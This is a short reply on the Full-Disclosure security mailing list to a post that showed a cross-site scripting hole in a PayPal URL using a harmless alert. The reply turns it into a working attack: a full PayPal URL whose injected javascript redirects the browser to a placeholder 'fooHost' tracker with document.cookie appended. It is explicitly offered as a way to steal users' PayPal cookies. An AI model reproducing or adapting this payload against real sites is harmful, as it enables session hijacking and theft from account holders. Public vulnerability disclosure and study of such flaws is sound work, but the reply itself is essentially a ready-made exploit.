Good find. How about using it to steal the entire PayPal cookie, though:
https://www.paypal.com/cgi-bin/webscr?cmd=xpt/popup/RandomAccessKey-outside&voice=javascript:window.location=%22http://fooHost/tracker.php?%22%2Bdocument.cookie;
auto113922@xxxxxxx wrote:
> https://www.paypal.com/cgi-bin/webscr?cmd=xpt/popup/RandomAccessKey-
> outside&voice=javascript:document.write('heh');alert('bl00p');
>
>
>
> Concerned about your privacy? Instantly send FREE secure email, no account
> required
> http://www.hushmail.com/send?l=480
>
> Get the best prices on SSL certificates from Hushmail
> https://www.hushssl.com?l=485
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
Attachment:
signature.asc
Description: OpenPGP digital signature
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/